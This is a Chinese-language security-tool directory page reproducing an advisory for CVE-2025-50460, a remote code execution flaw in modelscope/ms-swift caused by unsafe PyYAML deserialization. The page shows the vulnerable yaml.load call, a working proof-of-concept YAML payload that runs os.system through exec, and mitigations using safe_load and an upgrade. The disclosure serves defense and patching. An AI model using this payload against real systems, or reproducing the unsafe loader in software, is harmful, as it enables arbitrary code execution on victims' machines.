Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50460 — CVE-2025-50460 的技术细节和漏洞利用 | Kitploit
工具/GitHubGitHub/anchor0221/cve-2025-50460
静态分析漏洞分析代码分析漏洞利用论文与研究学习与教育
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

CVE-2025-50460 的技术细节和漏洞利用

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-50460:通过不安全的PyYAML反序列化在modelscope/ms-swift中实现远程代码执行

状态:等待分析
该CVE记录已被标记用于NVD丰富工作。

ms-swift项目版本3.3.0中存在一个远程代码执行(RCE)漏洞,原因是在tests/run.py中不安全地使用了PyYAML库(版本<=5.3.1)的yaml.load()进行反序列化。如果攻击者能够控制传递给--run_config参数的YAML配置文件的内容,则可以在反序列化过程中执行任意代码,从而导致系统完全受损。当加载恶意YAML文件时触发该漏洞,允许执行任意Python命令,如os.system()。建议将PyYAML升级到5.4或更高版本,并使用yaml.safe_load()来缓解该问题。

描述

modelscope/ms-swift 项目存在一个远程代码执行(RCE)漏洞,原因是使用了不安全的 yaml.load() 以及易受攻击的 PyYAML 库版本(≤ 5.3.1)。该问题存在于 tests/run.py 脚本中,其中用户提供的 YAML 配置文件使用 yaml.load() 和 yaml.FullLoader 进行反序列化。

如果攻击者能够控制或替换提供给 --run_config 参数的 YAML 配置文件,他们可以注入恶意负载,从而导致任意代码执行。

受影响的仓库

  • 项目: modelscope/ms-swift
  • 受影响版本: 最新
  • 文件: tests/run.py
  • GitHub永久链接: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • 依赖项: PyYAML <= 5.3.1

漏洞代码

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

概念验证(PoC)

步骤1:创建恶意YAML文件(exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

步骤2:使用易受攻击的PyYAML(<=5.3.1)执行

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

这将导致执行 os.system,证明代码执行。

缓解措施

  • 将 yaml.load() 替换为 yaml.safe_load()
  • 将 PyYAML 升级到 5.4 或更高版本

示例修复:

root@kitploit:~
# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

CVE状态

作者

  • 发现者:Yu Rong (戎誉) 和 Hao Fan (凡浩)
  • 联系方式:[[email protected] ]
下载工具
字段值
CVE IDCVE-2025-50460
CVSS评分TBD
CWECWE-502:不可信数据的反序列化
报告日期2025-04-25
披露日期2025-07-30
受影响版本最新
修复版本